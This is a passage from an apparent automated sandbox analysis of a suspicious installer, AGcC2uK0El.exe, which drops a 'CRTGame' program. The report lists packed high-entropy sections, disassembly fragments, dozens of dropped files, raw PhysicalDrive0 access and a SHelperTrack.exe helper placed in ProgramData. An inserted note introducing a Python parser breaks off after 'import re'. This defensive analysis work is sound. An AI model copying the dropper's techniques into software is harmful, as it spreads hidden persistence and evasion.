Source: is-HP7BQ.tmp.1.dr | Static PE information: section name: /4
Source: is-EATSP.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-EATSP.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-EATSP.tmp.1.dr | Static PE information: section name: petite
Source: is-JORH4.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-JORH4.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-JORH4.tmp.1.dr | Static PE information: section name: petite
Source: is-RGK44.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-RGK44.tmp.1.dr | Static PE information: section name: petite
Source: is-6ND5B.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-6ND5B.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-6ND5B.tmp.1.dr | Static PE information: section name: petite
Source: is-GSGD0.tmp.1.dr | Static PE information: section name: /4
Source: is-AMJ3K.tmp.1.dr | Static PE information: section name: .sxdata
Source: is-D10RQ.tmp.1.dr | Static PE information: section name: .didata
Source: is-PJ8MN.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-PJ8MN.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-PJ8MN.tmp.1.dr | Static PE information: section name: petite
Source: is-RJI5O.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-RJI5O.tmp.1.dr | Static PE information: section name: petite
Source: is-JU8A8.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-JU8A8.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-JU8A8.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-930UV.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-930UV.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-930UV.tmp.1.dr | Static PE information: section name: petite
Source: is-8DLTN.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-8DLTN.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-8DLTN.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-M07BP.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-M07BP.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-M07BP.tmp.1.dr | Static PE information: section name: petite
Source: is-FBHNA.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-FBHNA.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-FBHNA.tmp.1.dr | Static PE information: section name: petite
Source: is-5QDBA.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-5QDBA.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-5QDBA.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-IM6II.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-IM6II.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-IM6II.tmp.1.dr | Static PE information: section name: petite
Source: is-4CPU3.tmp.1.dr | Static PE information: section name: /4
Source: is-MDQ87.tmp.1.dr | Static PE information: section name: /4
Source: is-PJQ9V.tmp.1.dr | Static PE information: section name: /4
Source: is-DG85B.tmp.1.dr | Static PE information: section name: /4
Source: is-P33NB.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-P33NB.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-P33NB.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-JISVL.tmp.1.dr | Static PE information: section name: /4
Source: is-UVN7O.tmp.1.dr | Static PE information: section name: .eh_fram
Source: is-KU7UG.tmp.1.dr | Static PE information: section name: asmcode
Source: is-J56NG.tmp.1.dr | Static PE information: section name: .eh_fram
Source: is-2V0OO.tmp.1.dr | Static PE information: section name: /4
Source: is-LVBK5.tmp.1.dr | Static PE information: section name: /4
Source: is-QQL7E.tmp.1.dr | Static PE information: section name: /4
Source: SHelperTrack.exe.5.dr | Static PE information: section name: .hsave
Source: C:\Users\user\Desktop\AGcC2uK0El.exe | Code function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
Source: C:\Users\user\Desktop\AGcC2uK0El.exe | Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
Source: C:\Users\user\Desktop\AGcC2uK0El.exe | Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax 0_2_00408109
Source: C:\Users\user\Desktop\AGcC2uK0El.exe | Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\AGcC2uK0El.exe | Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\AGcC2uK0El.exe | Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
Source: C:\Users\user\Desktop\AGcC2uK0El.exe | Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\AGcC2uK0El.exe | Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
Source: C:\Users\user\Desktop\AGcC2uK0El.exe | Code function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_00409954 push 00409991h; ret 1_2_00409989
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_0040A04F push ds; ret 1_2_0040A050
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_0040A023 push ds; ret 1_2_0040A04D
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax 1_2_004062CD
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_004822F4 push 004823D2h; ret 1_2_004823CA
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_004765B0 push ecx; mov dword ptr [esp], edx 1_2_004765B1
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx 1_2_004106E5
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_00412938 push 0041299Bh; ret 1_2_00412993
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_004589F0 push 00458A34h; ret 1_2_00458A2C
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_00442C94 push ecx; mov dword ptr [esp], ecx 1_2_00442C98
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_00450E58 push 00450E8Bh; ret 1_2_00450E83
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_0045101C push ecx; mov dword ptr [esp], eax 1_2_00451021
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx 1_2_0040D03A
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_0049310C push ecx; mov dword ptr [esp], ecx 1_2_00493111
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_004571B0 push 004571E8h; ret 1_2_004571E0
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_0045F444 push ecx; mov dword ptr [esp], ecx 1_2_0045F448
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_0040546D push eax; ret 1_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_0040553D push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx 1_2_0040F59A
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_004055BE push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_0040563B push 00405749h; ret 1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
Source: crtgame.exe.1.dr | Static PE information: section name: .text entropy: 7.606165768727154
Source: is-JU8A8.tmp.1.dr | Static PE information: section name: (nameless) entropy: 7.953893773659523
Source: is-8DLTN.tmp.1.dr | Static PE information: section name: (nameless) entropy: 7.921519965168042
Source: is-FBHNA.tmp.1.dr | Static PE information: section name: (nameless) entropy: 7.966771808365004
Source: is-5QDBA.tmp.1.dr | Static PE information: section name: (nameless) entropy: 7.950928332152424
Source: is-P33NB.tmp.1.dr | Static PE information: section name: (nameless) entropy: 7.491817342209834
Source: SHelperTrack.exe.5.dr | Static PE information: section name: .text entropy: 7.606165768727154

                  Persistence and Installation Behavior

Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 5_2_00401A58
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 7_2_02C4F29C
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-RJL72.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-RJI5O.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-5JD36.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-P33NB.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-ULG4P.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-8DLTN.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-GN0SC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-H6A9P.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-9A8PJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-6ND5B.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-J56NG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-CHRTV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-PJQ9V.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-AMJ3K.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-MDQ87.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-ODQUV.tmp
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | File created: C:\ProgramData\SHelperTrack\SHelperTrack.exe
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-OSQAA.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-2V0OO.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-HLDR5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-UVN7O.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-JORH4.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-PJ8MN.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-Q9IJU.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-M07BP.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-DG85B.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-IM6II.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\uninstall\is-785C0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-UN741.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-O51E5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-HP7BQ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-5QDBA.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-FBHNA.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-I5CC7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-8JJ67.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-930UV.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-E5NVS.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-D10RQ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-GSGD0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-JISVL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-LVBK5.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\is-EATSP.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\crtgame.exe
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_RegDLL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | File created: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-6S6NV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeFile created: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-I1OEI.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-4CPU3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-JU8A8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-SJ07E.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-LP9D8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-QQL7E.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-DTLCM.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-RGK44.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-KU7UG.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-PJ2FQ.tmpJump to dropped file
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile created: C:\ProgramData\SHelperTrack\SHelperTrack.exeJump to dropped file
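The rows above are the installer's drop list; further down, in the same row format, the report lists the dropped PEs that were never started. Added example, not part of the Joe Sandbox report or of the sample: a Python parser for these rows that separates the fused source path, event label and trailing link text, strips the " (copy)" marker, flags the Inno Setup is-XXXXX.tmp staging names as volatile (they change per run), works out which dropped PEs actually ran (created, but absent from the not-started list, so it assumes that list is complete), and walks a drop back to the original sample. The eight embedded rows are copied from this report; the function names are mine.

```python
import re
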